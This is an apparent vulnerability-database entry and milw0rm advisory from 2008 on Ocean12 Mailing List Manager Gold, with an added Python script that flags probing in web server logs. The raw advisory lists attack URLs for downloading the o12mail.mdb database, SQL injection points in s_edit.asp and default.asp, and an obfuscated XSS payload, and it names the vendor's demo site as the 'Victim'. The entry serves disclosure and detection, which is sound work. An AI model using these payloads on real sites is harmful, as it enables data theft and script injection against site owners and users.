Vendor: Ocean12 Mailing List Manager Gold
By: Pouya_Server
CVSS: 7.5 (HIGH)
Vulnerability: DD,SQL,XSS
CWE: 89,79,79
Product Name: Ocean12 Mailing List Manager Gold
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: ocean12tech.com/products/o12mailgold
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Ocean12 Mailing List Manager Gold

Ocean12 Mailing List Manager Gold is affected by three issues (DD, SQL, XSS). SQL and XSS payloads can be injected through the 'email' and 'Name' parameters of the 's_edit.asp' and 'default.asp' scripts. The 'o12mail.mdb' file, which contains sensitive information, can also be downloaded directly.

Mitigation:

Update to the latest version of the application
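
A log-triage sketch for the three request patterns described above, useful for checking whether an installation was probed before it was updated. This is an added example, not part of the original advisory or the vendor's code; the sample URLs and the '/lists' path are constructed, and the character heuristics are assumptions that will also flag a legitimate address containing an apostrophe.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts, parameters and database file named in the advisory.
WATCHED_SCRIPTS = {"s_edit.asp", "default.asp"}
WATCHED_PARAMS = {"email", "name"}
DB_FILE = "o12mail.mdb"

# Heuristics (assumptions, tune for your traffic): characters that have no
# place in a name or e-mail field but are typical of injection attempts.
SQL_META = re.compile(r"'|--|;")
HTML_META = re.compile(r'[<>"]')

def classify(url):
    """Return the advisory categories (DD, SQL:<param>, XSS:<param>) a URL matches."""
    parts = urlsplit(url)
    # IIS paths are case-insensitive; decode so "%2Emdb" cannot dodge the match.
    script = unquote(parts.path).lower().rsplit("/", 1)[-1]
    findings = []
    if script == DB_FILE:
        findings.append("DD")
    if script in WATCHED_SCRIPTS:
        # parse_qsl percent-decodes values and keeps repeated parameters.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            key = key.lower()
            if key not in WATCHED_PARAMS:
                continue
            if SQL_META.search(value):
                findings.append("SQL:" + key)
            if HTML_META.search(value):
                findings.append("XSS:" + key)
    return findings

def scan(urls):
    """Return (url, findings) pairs for every URL with at least one finding."""
    return [(u, f) for u in urls if (f := classify(u))]

# Constructed sample request URLs (not real traffic).
SAMPLE_REQUESTS = [
    "/lists/o12mail.mdb",
    "/lists/s_edit.asp?email=user%40example.com",
    "/lists/s_edit.asp?email=user%40example.com%27",
    "/lists/default.asp?Page=2&Email=%27x",
    "/lists/default.asp?Name=&Email=a%40example.com%22%3E%3Cb%3E",
]

if __name__ == "__main__":
    for url, findings in scan(SAMPLE_REQUESTS):
        print(",".join(findings), url)
```

Feed it the URI column of the web server's access log; any "DD" hit that was answered with a 200 status means the database file was served and its contents should be treated as exposed.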

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: Ocean12 Mailing List Manager Gold
Vendor : http://ocean12tech.com/products/o12mailgold
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD,SQL,XSS)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/o12mail.mdb
[SQL]:
http://site.com/[Path]/s_edit.asp?email=[SQL]
http://site.com/[Path]/default.asp?Page=2&Email='[SQL]
[XSS]:
http://site.com/[Path]/default.asp?Error=Pouya_Server&Name=&Email=Pouya.s3rver@gmail.com"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>

---------------------------------
Victim :
http://ocean12tech.com/products/o12mailgold/demo

# milw0rm.com [2008-12-02]